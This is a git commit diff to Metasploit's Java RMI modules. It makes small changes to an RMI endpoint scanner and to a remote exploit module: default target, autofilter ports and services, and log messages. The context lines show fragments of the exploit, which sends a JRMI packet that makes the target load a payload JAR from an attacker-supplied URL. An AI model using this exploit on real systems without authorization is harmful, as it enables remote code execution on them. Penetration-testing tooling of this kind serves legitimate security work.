Small updates to the rmi modules
This commit is contained in:
parent
63ed7fcc8f
commit
4c2e1c2859
|
@ -48,14 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if res and res =~ /^\x4e..([^\x00]+)\x00\x00/
|
if res and res =~ /^\x4e..([^\x00]+)\x00\x00/
|
||||||
info = $1
|
info = $1
|
||||||
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected (identified us as '#{info}')")
|
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected (identified us as '#{info}')")
|
||||||
report_service(:host => rhost, :port => rport, :name => "rmi", :info => "Java RMI Endpoint (identified us as #{info})")
|
report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Java RMI Endpoint")
|
||||||
report_vuln(
|
|
||||||
:host => rhost,
|
|
||||||
:name => self.fullname,
|
|
||||||
:port => rport,
|
|
||||||
:info => "Identified Java RMI Endpoint",
|
|
||||||
:refs => self.references
|
|
||||||
)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
rescue ::Interrupt
|
rescue ::Interrupt
|
||||||
|
|
|
@ -79,9 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 1
|
'DefaultTarget' => 0
|
||||||
))
|
))
|
||||||
register_options( [ Opt::RPORT(1099) ], self.class)
|
register_options( [ Opt::RPORT(1099) ], self.class)
|
||||||
|
|
||||||
|
register_autofilter_ports([ 1098, 1099 ])
|
||||||
|
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -101,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
packet[idx, find_me.length] = len + new_url
|
packet[idx, find_me.length] = len + new_url
|
||||||
|
|
||||||
# write out minimal header and packet
|
# write out minimal header and packet
|
||||||
print_status("Sending request for #{new_url}")
|
print_status("Connected and sending request for #{new_url}")
|
||||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
||||||
|
|
||||||
|
@ -130,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Pragma' => 'no-cache'
|
'Pragma' => 'no-cache'
|
||||||
})
|
})
|
||||||
|
|
||||||
print_status("Replied to Request for Payload JAR")
|
print_status("Replied to request for payload JAR")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue